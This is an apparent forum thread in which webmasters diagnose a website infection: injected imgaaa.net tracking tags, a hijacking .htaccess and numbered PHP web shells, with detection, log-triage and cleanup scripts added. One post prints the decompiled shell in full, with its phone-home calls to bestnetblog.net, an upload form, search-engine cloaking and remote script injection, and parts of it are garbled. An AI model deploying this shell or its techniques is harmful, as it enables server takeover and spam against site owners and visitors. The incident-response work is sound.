How to remove the virus on my server

Hi All

My server is infected by a virus, I think :confused:. It inserts a line at the end of the code like below, but when I check the footer code it does not show; it only shows in the page source.
Please help me with how I can remove it.

</body>
</html><img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=8999982">

<snip/>

hello anyone for help?

This sort of code injection has been covered many times on this forum before, e.g. look at some of these posts. There's plenty of information amongst them on likely causes and cures.

The link is dead. What was the search term?

Brandon

Same happened to me on all my VPS - here are my findings so far:

The source seems to be an infection by a Trojan - probably Win32/Kryptik - in a first step you will see an injection of the above type in all index.html and index.php. The ID number varies. Look out for less obvious index.* files in subdirectories.

In a second step (in my case about a day later) the real attack happens:
you will find files like 42.php or 23.php - always two digits - and a bogus .htaccess - the .htaccess looks like this:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]
</IfModule>

The malicious 26.php (or whatever number it may have) uncompresses binary code:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/Zm...

I am only a couple of hours into the investigation of this attack, so all I know is a bit superficial at this point. I am more than happy to exchange thoughts and info about this.

Cheers

Sven

PS: I saw some forums pointing to the lizamoon attack - but so far I have my doubts that this is actually connected.
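As an added example (not code from this thread or from any of the posters), here is a small Python scanner that looks for the indicators described in the two stages above: the 1x1 tracking image pointing at imgaaa.net/t.php, the eval(gzuncompress(base64_decode( shell, two-digit (or n.php) shell file names, a .htaccess that rewrites every request into a numbered .php?q=, and a hidden .log/ working directory. It only reports; it deletes nothing. The sample web root it builds, its file names and contents are constructed for the demonstration, and the shell stub contains a placeholder string, not a payload.

```python
import os
import re
import shutil
import tempfile

# Indicators from the thread: the 1x1 tracking image, the gz-packed eval() shell,
# two-digit (or n.php) shell names, the catch-all .htaccess rewrite into a
# numbered .php, and the hidden .log/ working directory the shell creates.
IMG_TAG = re.compile(r'<img[^>]*imgaaa\.net/t\.php\?id=\d+[^>]*>', re.I)
EVAL_SHELL = re.compile(r'eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(', re.I)
SHELL_NAME = re.compile(r'^(\d{2}|n)\.php$')
HTACCESS_HIJACK = re.compile(r'RewriteRule\s+\^\(\.\*\)\$?\s+\S+\.php\?q=', re.I)


def scan_tree(root):
    """Walk root and return sorted (path, indicator) pairs for every hit."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d == '.log':
                findings.append((os.path.join(dirpath, d), 'hidden .log/ working directory'))
        for name in filenames:
            path = os.path.join(dirpath, name)
            if SHELL_NAME.match(name):
                findings.append((path, 'shell-style file name (nn.php / n.php)'))
            try:
                with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                    data = fh.read()
            except OSError:
                continue
            if name == '.htaccess' and HTACCESS_HIJACK.search(data):
                findings.append((path, '.htaccess rewrites every request into a .php?q='))
            if EVAL_SHELL.search(data):
                findings.append((path, 'eval(gzuncompress(base64_decode( shell'))
            if IMG_TAG.search(data):
                findings.append((path, 'imgaaa.net tracking <img> tag'))
    return sorted(findings)


def build_fixture(root):
    """Constructed sample web root (not real malware): two pages carrying the
    injected tag, one clean page, a hijacked .htaccess, a shell stub and .log/."""
    os.makedirs(os.path.join(root, 'wp-admin', '.log'))
    tag = '<img heigth="1" width="1" border="0" src="http://imgaaa.net/t.php?id=8999982">'
    files = {
        'index.html': '<html><body>home</body>\n</html>' + tag,
        'about.html': '<html><body>clean page</body></html>',
        'wp-admin/functions.php': "<?php\nfunction site_footer() { ?></html>" + tag + "<?php }\n",
        # placeholder string only; the detector keys on the eval(gzuncompress(base64_decode( wrapper
        'wp-admin/26.php': '<?php eval(gzuncompress(base64_decode("PLACEHOLDER_NOT_A_PAYLOAD")));',
        '.htaccess': ('<IfModule mod_rewrite.c>\nRewriteEngine On\n'
                      'RewriteCond %{REQUEST_FILENAME} !-f\n'
                      'RewriteCond %{REQUEST_FILENAME} !-d\n'
                      'RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]\n</IfModule>\n'),
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), 'w', encoding='utf-8') as fh:
            fh.write(body)


def demo():
    """Build the fixture in a temp dir, scan it, clean up, return relative findings."""
    root = tempfile.mkdtemp()
    try:
        build_fixture(root)
        return [(os.path.relpath(p, root), ind) for p, ind in scan_tree(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == '__main__':
    for path, indicator in demo():
        print(f'{path}: {indicator}')
```

Run it against a copy of the web root rather than the live one, and review each hit by hand: a legitimately named 42.php is possible, and the .htaccess rule is the strongest signal because it silently routes every non-file request through the shell.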

Do a search for ‘gumblar’ in all forums

Excuse me, but from what we are observing we are not dealing with “Gumblar” or a variant. There are similarities, but rather remote ones.

What we are seeing is a 2 stage attack:

stage 1: injection of html code (nothing executable!!) - the code seems to serve only to notify the bad guys of the hacked URL.

stage 2: about a day later I see uploads of malicious code.

To me it looks like an exploitation of the Win32/Kryptik Trojan (aka TR/Crypt.XPACK.Gen).

What bothers me is the missing link - I don’t really understand why they do this. If the Trojan sends the username and passwords for FTP access - why do they need to inject HTML code to pass an ID number? Why don’t they inject malicious code right away or FTP it there?

Did anyone decode the binary code yet?

Sven

I was answering the OP, not you. The question is how did they manage to inject the code in the first place, this is what matters. The secondary payload, and what it decodes to (as it happens a trivial task) won’t close the original point of entry.

Now I can’t see the code as it is gone… What I can see is that the iframe is linking to another domain, and this makes it look similar to some other threats: a trojan has infected a PC, it steals FTP credentials, installs a backdoor/shell, and injects code which links to another domain which tries to exploit a known vulnerability in Adobe PDF and/or SWF to execute arbitrary code…

These kinds of attacks are poorly detected and quite successful.

It might be Kryptik or some similar trojan, so clean your computer, your files, your server and change passwords.

A client of mine had the same.

Do a malware scan and do not use CuteFTP or any other popular FTP program. All those passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them.

Here is the disassembled file (n.php) that makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.

Files known to be infected:

n.php
/.log/ this folder is sometimes created, delete it.
.htaccess will be overwritten, check it.
Check every index.php / .html for the img tag.



<?

error_reporting(round(0));
if (isset(_GET[q]))
{
    if( !(preg_match("/^([a-z0-9-.)(&=]*)/i", _GET[q])))
    {
        die;
        
    }
    
}

if (extension_loaded(curl) &&function_exists(curl_init) &&function_exists(curl_exec))
{
    function l__0(_0)
    {
        _1 =curl_init();
        curl_setopt(_1, 10002, _0);
        curl_setopt(_1, 42, round(0));
        curl_setopt(_1, 19913, round(0+1));
        curl_setopt(_1, 52, round(0+0.25+0.25+0.25+0.25));
        curl_setopt(_1, 13, round(0+6.66666666667+6.66666666667+6.66666666667));
        curl_setopt(_1, 3, round(0+80));
        curl_setopt(_1, 10018, Mozilla/4.0 (compatible;
        MSIE 6.0;
        Windows NT 5.2;
        SV1;
        .NET CLR 2.0.50727;
        InfoPath.1));
        _2 =curl_exec(_1);
        _3 =curl_getinfo(_1, 2097154);
        if (_3 >
        = round(0+200+200)) _2 = false;
        curl_close(_1);
        return _2;
        
    }
    
    
}

else if(function_exists( file_get_contents))
{
    function l__0(_0)
    {
        return file_get_contents(_0);
        
    }
    
    
}

else die( not work);
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
@mkdir( .log/);
@chmod( .log/,round(0+255.5+255.5));
@mkdir( .log/._4);
@chmod( .log/._4,round(0+127.75+127.75+127.75+127.75));
_5 = .log/._4. /xmlrpc.txt;
if (@fopen(_5, r))
{
    
}

else
{
    _6 =fopen( .log/._4. /xmlrpc.txt, w+);
    fwrite(_6, bestnetblog.net);
    fclose(_6);
    
}

if ( _GET[ q] == alcobro )
{
    _5 = .htaccess;
    if (file_exists(_5))
    {
        _7 = disable;
        
    }
    
    else
    {
        _8 = " RewriteEngine On RewriteCond %
        {
            REQUEST_FILENAME
        }
        
        !-f RewriteCond %
        {
            REQUEST_FILENAME
        }
        
        !-d RewriteRule ^(.*) "._SERVER[ SCRIPT_NAME]."?q=1 [L] ";
        _9 =fopen( .htaccess, w+);
        fwrite(_9,_8);
        fclose(_9);
        _7 = enable;
        
    }
    
    curlit =file_get_contents( .log/._4. /xmlrpc.txt);
    _11 = http://.curlit. /logdomain.php?q=._SERVER[ HTTP_HOST];
    _12 = l__0(_11);
    echo _12._7;
    die;
    
}

if (_GET[ dom100500] != )
{
    _13 =fopen( .log/._4. /xmlrpc.txt, w+);
    fwrite(_13,_GET[ dom100500]);
    fclose(_13);
    echo 100500ok;
    die;
    
}

if (_GET[ up100500] != )
{
    _14 = ;
    _14 = _14 .basename( _FILES[ uploaded][ name]) ;
    _15=round(0+0.5+0.5);
    if(move_uploaded_file(_FILES[ uploaded][ tmp_name], _14))
    {
        echo up100500;
        
    }
    
    echo '<
    form enctype="multipart/form-data" method="POST">
    <
    input name="uploaded" type="file">
    <
    input type="submit" value="U">
    <
    /form>'
    ;
    die;
    
}

function l__1(_16)
{
    _4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
    _17 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
    _18 =str_replace( -, +,_17);
    _18 =str_replace( _, +,_17);
    _19 = http://www.google.com/search?hl=en&as_q=._18. &num=100&as_qdr=all;
    _20 = l__0(_19);
    preg_match_all( #<div class="s">(.*)<br>#U,_20,_21);
    _22=array();
    for (_23=round(0);
    _23<
    ="" _31;
    ="" ++_32)="" _33="_28[_30][_32];
    " this-="">
    _26[_33][] = _28[_30][_32+round(0+0.2+0.2+0.2+0.2+0.2)];
    
}


}

_34 =array_keys(this->
_26);
foreach (_34 as _17)
{
    this->
    _26[_17] =array_unique(this->
    _26[_17]);
    
}


}

function l__3(_35)
{
    _36 = round(0);
    for (_30=round(0);
    _36 <
    _35;
    ++_30)
    {
        _37 =array_rand(this->
        _26);
        _38 =mt_rand(round(0+1.25+1.25+1.25+1.25), round(0+4+4+4));
        for (_32=round(0);
        _32_26[_37][mt_rand(round(0),count(this->
        _26[_37]) - round(0+0.5+0.5))];
        if (_40 == ) _40 =array_rand(this->
        _26);
        _37 = _40;
        if (_37 == ) break round(0+0.5+0.5+0.5+0.5);
        
    }
    
    
}

foreach (_39 as _41)
{
    _42=count(_41);
    if (_42<
    =round(0+2)) continue;
    if (strlen(_41[_42-round(0+0.5+0.5)]) <
    round(0+0.8+0.8+0.8+0.8+0.8)) unset(_41[_42-round(0+0.333333333333+0.333333333333+0.333333333333)]);
    _41[_42-round(0+2)] =rtrim(_41[_42-round(0+2)], ,:;
    );
    _41[_42-round(0+0.25+0.25+0.25+0.25)] =rtrim(_41[_42-round(0+0.25+0.25+0.25+0.25)], ,:;
    );
    _43 .=ucfirst(implode(  , _41)). . ;
    
}

_43 =str_replace(  ., ., _43);
return _43;

}


}

_27 = _25;
_44 = new l__2(_27);
_45 = _44->
l__3(round(0+466.666666667+466.666666667+466.666666667));
_45 =preg_replace( /[^a-zA-Z\\., -]+?/, , _45);
_46 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_46=str_replace( -,  ,_46);
_46=str_replace( _,  ,_46);
_47 =str_replace (  , +, _46);
if(_GET[ page] != 1)
{
    _48 = &start=.(_GET[ page]-round(0+0.5+0.5))*round(0+10.5+10.5);
    
}

_49 = l__0( http://images.google.com/images?q=._47. &lr=lang_en._48);
preg_match_all( /href="?\\/imgres\\?imgurl=([^\\&]+)/, _49, _50);
_51 = array();
for (_32 = round(0);
_32 _54 ) break;
preg_match_all( #^\\.log/._4."/(.*).html#i", _58, _59 );
_57 .= <a href="._53._59[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _,  ,str_replace( -,  , _59[round(0+0.5+0.5)][round(0)])). ">.str_replace( _,  ,str_replace( -,  , _59[round(0+0.333333333333+0.333333333333+0.333333333333)][round(0)])). </a>, ;
_56++;

}

_60 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= .str_replace(  , %20, _46));
preg_match_all( |\\["([^"]+)",|si, _60, _61, 1);
_62 = round(0);
array_shift(_61[round(0+0.2+0.2+0.2+0.2+0.2)]);
foreach (_61[round(0+0.333333333333+0.333333333333+0.333333333333)] as _63)
{
    _64 .= <a href='._53.str_replace(  , -, _63). ' title='._63. '> . _63 . </a>, ;
    if (_62++ >
    round(0+2.75+2.75+2.75+2.75)) break;
    
}

_65 = _53._GET[ q];
_66 = <
_72;
_32++ )
{
    if ( (preg_match( /\\<
    script/imsU, _73[round(0)][_32]) == round(0)) AND (strlen(_73[round(0)][_32]) >
    _74) )
    {
        _74 =strlen(_73[round(0)][_32]);
        _75 = _32;
        
    }
    
    
}

_71 =str_ireplace( _73[round(0)][_75], _73[round(0)][_75]. <
REPLACEME>
, _71 );
_76 =fopen( _70, w );
fputs(_76, _71);
fclose(_76);

}

_77 = <
h1>
.strtoupper(_46)._78. <
/h1>
._64._57. ._69. <p>._66. </p>;
return _77;

}

function l__4(_79)
{
    _4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
    _80= .log/._4. /._79 . .html._GET[ page];
    if(@file_exists(_80))return@file_get_contents(_80);
    _16=str_replace( -,  ,_79);
    _16=str_replace( +,  ,_79);
    _81=l__1(_16);
    _82=@fopen(_80, w);
    @fwrite(_82,_81);
    @fclose(_82);
    return _81;
    _83=file_get_contents(_80);
    
}

_84=array( 66.228., 67.195., 68.142., 66.196., 68.180., 72.30., 74.6., 66.94., 66.163., 64.75., 216.32., 66.163., 65.52., 65.53., 65.54., 65.55., 66.249., 66.102., 209.85., 72.14., 74.125., 64.68., 64.233., 216.239., 173.194., 91.184., 94.231., 127.0., 31.43.);
_85=getenv( REMOTE_ADDR);
_86=explode( ., _85);
for (_32=round(0);
;
_32++)
{
    if(_84[_32]==NULL) break;
    _87=explode( ., _84[_32]);
    if(_87[round(0)]==_86[round(0)]&&_87[round(0+0.333333333333+0.333333333333+0.333333333333)]==_86[round(0+0.333333333333+0.333333333333+0.333333333333)])
    {
        if(_GET[ q]!= )
        {
            _70 = .log/._4. /shab100500.txt;
            if (filesize(_70) <
            round(0+200+200+200+200) )
            {
                _71 = <
                head>
                <
                title>
                title<
                /title>
                <
                /head>
                <
                body>
                <
                REPLACEME>
                <
                /body>
                <
                /html>
                ;
                
            }
            
            else
            {
                _71 =file_get_contents( _70 );
                
            }
            
            _88=basename(_GET[ q]);
            _46 = _GET[ q];
            _46=str_replace( -,  ,_46);
            _46=str_replace( .html, ,_46);
            _71 =preg_replace( /<
            title>
            (.*)<
            \\/title>
            /imsU, <
            title>
            .ucwords(_46). <
            /title>
            <
            meta name="googlebot" content="noarchive">
            , _71 );
            _71 =str_ireplace( <
            REPLACEME>
            , l__4(_88), _71 );
            print _71;
            exit;
            
        }
        
        
    }
    
    
}

if (_GET[ q]!= )
{
    if (strpos(_SERVER[ HTTP_USER_AGENT], Opera) !== false)
    {
        echo <
        script>
        ;
        include( .log/._4. /iog.txt);
        echo <
        /script>
        ;
        die;
        
    }
    
    if (strpos( _SERVER[ HTTP_REFERER], site% ) >
    round(0) )
    {
        
    }
    
    else
    {
        if (strpos( _SERVER[ HTTP_REFERER], google. ) ||strpos( _SERVER[ HTTP_REFERER], yahoo. ) ||strpos( _SERVER[ HTTP_REFERER], bing. )>
        round(0) )
        {
            _89 = round(0+10+10+10)*round(0+15+15+15+15);
            _90= .log/._4. /iog.txt;
            if(!file_exists(_90)||time()-filemtime(_90)>
            _89)
            {
                curlit =file_get_contents( .log/._4. /xmlrpc.txt);
                _91 = http://.curlit. /badcompany.php?q=._4._SERVER[ SCRIPT_NAME];
                _2 = l__0(_91);
                _92 =fopen( .log/._4. /iog.txt, w+);
                fwrite(_92,_2);
                fclose(_92);
                
            }
            
            echo <
            script>
            ;
            include( .log/._4. /iog.txt);
            echo <
            /script>
            ;
            die();
            
        }
        
        
    }
    
    
}

header( Location: http://._SERVER[ HTTP_HOST]);


?>

Grep:

imgaaa.net/t.php
‘eval(gzuncompress(’

Attack log example:

91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro

This IP is used to monitor activity, it’s probably also hacked.

They seem to do it for SEO scores, that’s what I deduce from the disassembly.
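As an added example (not from this thread or its posters), a log triage script that picks out the request pattern shown in the attack log entry above. The shell's control parameters come from the decompiled code posted earlier: q=alcobro makes it write the .htaccess and phone home, dom100500 sets the phone-home domain, and up100500 serves the upload form. The log lines are constructed for the demonstration (the first is modelled on the quoted entry, with the remaining combined-format fields made up); the format is Apache combined log.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix; only the request target is needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Shell file names seen in the thread (two digits, or n.php) under any directory.
SHELL_PATH = re.compile(r'(^|/)(\d{2}|n)\.php$')
# Query parameters the decompiled shell reacts to.
CONTROL_PARAMS = {
    'dom100500': 'dom100500= sets the phone-home domain',
    'up100500': 'up100500= opens the file-upload form',
}

# Constructed sample log; the first entry is modelled on the one quoted in the thread.
SAMPLE_LOG = [
    '91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro HTTP/1.1" 200 14 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '203.0.113.7 - - [02/Apr/2011:05:31:02 +0200] "GET /11.php?dom100500=c2.example.invalid HTTP/1.1" 200 8 "-" "Mozilla/4.0"',
    '198.51.100.3 - - [02/Apr/2011:06:10:00 +0200] "POST /wp-admin/26.php?up100500=1 HTTP/1.1" 200 120 "-" "Mozilla/4.0"',
    '192.0.2.5 - - [02/Apr/2011:06:12:11 +0200] "GET /index.php HTTP/1.1" 200 5120 "http://www.google.com/search?q=x" "Mozilla/5.0"',
    '192.0.2.9 - - [02/Apr/2011:06:13:00 +0200] "GET /about.html HTTP/1.1" 404 300 "-" "Mozilla/5.0"',
]


def triage(lines):
    """Return one record per request that matches the shell's traffic pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        url = urlsplit(m.group('target'))
        params = parse_qs(url.query, keep_blank_values=True)
        reasons = []
        if SHELL_PATH.search(url.path):
            reasons.append('request to nn.php / n.php shell path')
        if 'alcobro' in params.get('q', []):
            reasons.append('q=alcobro check-in')
        for name, why in CONTROL_PARAMS.items():
            if name in params:
                reasons.append(why)
        if reasons:
            hits.append({'ip': m.group('ip'), 'ts': m.group('ts'), 'path': url.path,
                         'status': int(m.group('status')), 'reasons': reasons})
    return hits


def demo():
    """Run the triage over the constructed sample log."""
    return triage(SAMPLE_LOG)


if __name__ == '__main__':
    for hit in demo():
        print(hit['ts'], hit['ip'], hit['path'], '; '.join(hit['reasons']))
```

Feed it the real access log with something like `triage(open('/var/log/apache2/access.log'))`; the first q=alcobro hit gives the time the shell went live, and every source IP on those requests is worth blocking and reporting, since the posters above note that the monitoring host is probably itself compromised.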

Anyone came up with a tool that will remove the <img> tags?

It really sucks doing this manually over all sites/folders…

If you have an editor with find/replace functionality like Dreamweaver, you can RegEx it out. Dreamweaver can replace parts in files in a complete folder, with RegEx functionality. So it’s useful.

I did this:

Find:

imgaaa.net/t.php\?id=.*?">

Replace with:

‘FOOBAR’

Then run once again for removal:

Find:

<img heigth=“1” width=“1” border=“0” src="http://FOOBAR

Replace:

//empty nothing.

Took 10 seconds for a whole server copy with hundreds of files.

- Good luck!

Okay, I was just in a coding mood and wrote a clean tool for you in PHP. It does work here, just tested it. But you might want to be careful. It’s a recursive scanner that deletes the n.php files, and modifies existing files with the image.


<?php

$log = "";

function fixgumblar($start_dir){
  global $log;   // the original assigned to a local $log, so the final echo printed nothing

  $file_type = '/(\.php|\.html|\.htm)$/i';

  $dirlist = opendir($start_dir);
  if ($dirlist === false){
    $log .= $start_dir." could not be opened\r\n";
    return false;
  }
  while (($file = readdir($dirlist)) !== false){
    if ($file == '.' || $file == '..') continue;
    $newpath = $start_dir.'/'.$file;
    if (is_dir($newpath)){
      fixgumblar($newpath);
      continue;
    }
    if (!preg_match($file_type, $newpath)) continue;

    $inputline = file_get_contents($newpath); // fread(filesize()) failed on empty files
    if ($inputline === false) continue;

    if (stristr($inputline, 'eval(gzuncompress(') !== FALSE) {
      unlink($newpath); // remove the n.php / nn.php shells
      $log .= $newpath." REMOVED!\r\n";
      continue;        // the original fell through here and could re-create the deleted file
    }

    $count = 0;        // reset per file; a stale $count from the previous file caused spurious writes
    $inputline = preg_replace('/<img heigth="1" width="1" border="0" src="http:\/\/imgaaa\.net\/t\.php\?id=.*?">/', '', $inputline, -1, $count);
    if ($count){
      file_put_contents($newpath, $inputline);
      $log .= $newpath." EDITED (".$count." tag(s) removed)\r\n";
    }
  }
  closedir($dirlist);
  return true;
}

// Run this from outside the scanned tree: the file itself contains the literal
// 'eval(gzuncompress(' it searches for and would otherwise delete itself.
fixgumblar('./test');  // provide start folder, no trailing slash!

echo $log;

Here are the test files, which also contain parts of the corrupt files, so please delete after use:

http://www.easy-share.com/1914559087/try.rar

alternative download:

http://www.filedropper.com/try_1

Good luck!

Likely cause(s):


c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.
c:\documents and settings\administrator\my documents\downloads\messenger.exe (Trojan.Dropper) -> Quarantined and deleted successfully.
c:\documents and settings\administrator\local settings\ emp\yme3iala.exe (Malware.Packer) -> Quarantined and deleted successfully.
c:\documents and settings\administrator\local settings\ emp\_CA.tmp (Trojan.Dropper) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\crt.dat (Malware.Trace) -> Quarantined and deleted successfully.
c:\WINDOWS\system32\cryptnet32.dll (Trojan.Tracur) -> Delete on reboot.

Since last week more reports are dripping in from more clients, so beware, we might have a zero-day on our hands. Our systems and our client systems are updated every single day. Suggestion: disable Java, Flash and disable scripting in PDF readers.

Additional info for (future) reference:

c:\WINDOWS\system32\dll.dll <- might be infected too, based on further reports.

Propagation evidence

Due to one of the following issues in respective order:

    • Malicious PDF file (likely: found trojanized PDF on client PC)
    • Java Applet (likely: found corrupt web cache with malware packer )
    • Flash exploit (not likely, possible yet.)
    • Media file (wmv, codec, not likely.)

We had this appear on our client servers yesterday too. The imgaaa.net link was added to a few files (also a functions.php file under WordPress, so this is not limited to just index.php).

The FTP log showed that the file was uploaded from an IP tracked to India.

We are still in the process of trying to find out how many sites were affected and what was the entry point. All computers related are being scanned.

Anyone got any more info on this vulnerability / point of entry? Even Google can’t seem to find any thread anywhere with conclusive data, just a ton of threads and pages from the last week or so describing the problem around the web.

It doesn’t really help to just fix the servers if we still have a trojan / keylogger roaming free somewhere.

I disassembled the code, had a look at all date changes on files and nothing else besides the above is modified/added. If it is, you might have another version of it, or something completely different.

The complete disassembled code: #1794541 - Pastie

Hi…

Special thanks to “unknownimous”, you’re good. This big malware script caused the same problem in my clients’ site. I was trying to decode this code but I was unsuccessful, and thanks for your solutions for this malware. Can you tell me how to decode this code?? It’s a very interesting part.

hxxp://malsite1 and hxxp://malsite2 are sister sites making high traffic through Google. They are targeting high-traffic sites, hacking them and then uploading the virus code. Whenever a visitor enters a search query for a keyword relevant to your site and Google shows your site in the results, at that time this script is chaining the search string to what they need, and they make big traffic.

Please tell me how to decode this code

my id : <snip/>

I’m glad to help out, and hope it will be useful since I know what a massive pain it can be once such attack happened.

I disassembled it by using var_dump($code) in PHP, then looking at the arrays, running a replacement function, then another round of var_dump() until you get what’s above. It can also be automated through a ‘PHP Bytecode Disassembler’. Somewhere on Google for download.